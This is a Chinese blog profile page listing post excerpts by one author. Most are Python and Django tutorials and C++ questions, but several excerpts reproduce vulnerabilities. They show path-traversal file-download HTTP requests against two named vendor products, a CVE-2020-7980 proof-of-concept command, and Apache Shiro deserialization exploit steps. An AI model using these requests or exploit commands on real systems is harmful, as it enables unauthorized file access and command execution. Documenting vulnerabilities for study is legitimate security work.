- 博客(7)
- 问答 (4)
- 收藏
- 关注
RSS订阅原创 2020-12-22
新开普电子股份有限公司_任意文件下载物联网平台GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: gzip,deflateHost: 127.0.0.1:8080User-Agen
2020-12-22 08:50:57
839
原创 2020-12-22
深圳银澎云计算有限公司任意文件下载好视通GET /register/toDownload.do?fileName=…/WEB-INF/web.xml HTTP/1.1Referer: http://127.0.0.1:8086/Cookie: JSESSIONID=49053781E7D31521EBD73EBE85A031C2;mldn-session-id=8c35b1b1-2ab3-45a0-b86a-f107b2b02fcbAccept: textml,application/xhtml
2020-12-22 08:44:52
220
原创 CVE-2020-7980
影响版本Intellian v1.12, v1.21, v1.24.```pythonpocCVE-2020-7980 https://github.com/Xh4H/Satellian-CVE-2020-7980python satellian.py -u http://xxx.com
2020-07-29 17:21:55
693
原创 Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。1.搭建好环境2.复现http://目标IP:8080python shiro_exploit.py -u http://ip:80
2020-07-14 16:35:35
899
1
原创 django安装, 创建第一个项目
Django 下载地址:https://www.djangoproject.com/download/或者pip命令或者pip命令pip install Django安装指定版本pip install Django=2.1django-admin startproject democd demopython3 manage.py runserver 0.0.0.0:8000...
2020-04-17 14:24:31
84
原创 Python3 Requests 模块
Python3 Requests 模块首先安装 requestspip install requests发送get请求 设置超时时间 timeout 单位秒import requestsurl r = r"https://www.baidu.com/"headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x6...
2020-04-14 21:18:18
160
原创 python
pythonPython ssh 连接安装库 paramiko linux pip3 install paramiko win pip install paramikoimport paramiko #创建一个ssh的客户端,用来连接服务器ssh = paramiko.SSHClient()#创建一个ssh的白名单know...
2020-04-14 20:50:24
107
空空如也
一个c++的小问题 fin >> num; fin.get(); 上面2句是什么意思
2017-02-06
C++编写延时循环有大神帮我一下吗?万分感谢!!!!
2016-12-31
大神们 C++中逗号运算符
2016-12-29
关于C++中逗号运算符 为什么运行不起来呀 还出现很多的错误
2016-12-29
TA创建的收藏夹 TA关注的收藏夹
TA关注的人